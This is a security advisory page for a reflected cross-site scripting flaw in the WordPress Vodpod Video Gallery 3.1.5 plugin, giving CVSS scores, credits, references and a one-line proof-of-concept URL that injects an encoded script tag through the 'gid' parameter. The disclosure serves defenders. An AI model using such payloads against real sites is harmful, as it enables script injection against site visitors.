WordPress Vodpod Video Gallery 3.1.5 Cross-site Scripting

2011-10-09 / 2011-10-10
Credit: John Leitch
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

------------------------------------------------------------------------ Software................WordPress Vodpod Video Gallery 3.1.5 Vulnerability...........Reflected Cross-site Scripting Download................http://wordpress.org/extend/plugins/vodpod-video-gallery/ Release Date............11/5/2010 Tested On...............Windows Vista + XAMPP ------------------------------------------------------------------------ Author..................John Leitch Site....................http://www.johnleitch.net/ Email...................john.leitch5@gmail.com ------------------------------------------------------------------------ --Description-- A reflected cross-site scripting vulnerability in WordPress Vodpod Video Gallery 3.1.5 can be exploited to execute arbitrary JavaScript. --PoC-- http://localhost/wordpress/wp-content/plugins/vodpod-video-gallery/vodpod_gallery_thumbs.php?gid=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

References:

http://xforce.iss.net/xforce/xfdb/63057
http://www.johnleitch.net/Vulnerabilities/WordPress.Vodpod.Video.Gallery.3.1.5.Reflected.Cross-site.Scripting/58
http://secunia.com/advisories/42195
http://packetstormsecurity.org/1011-exploits/wpvodpod-xss.txt
http://osvdb.org/69084


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top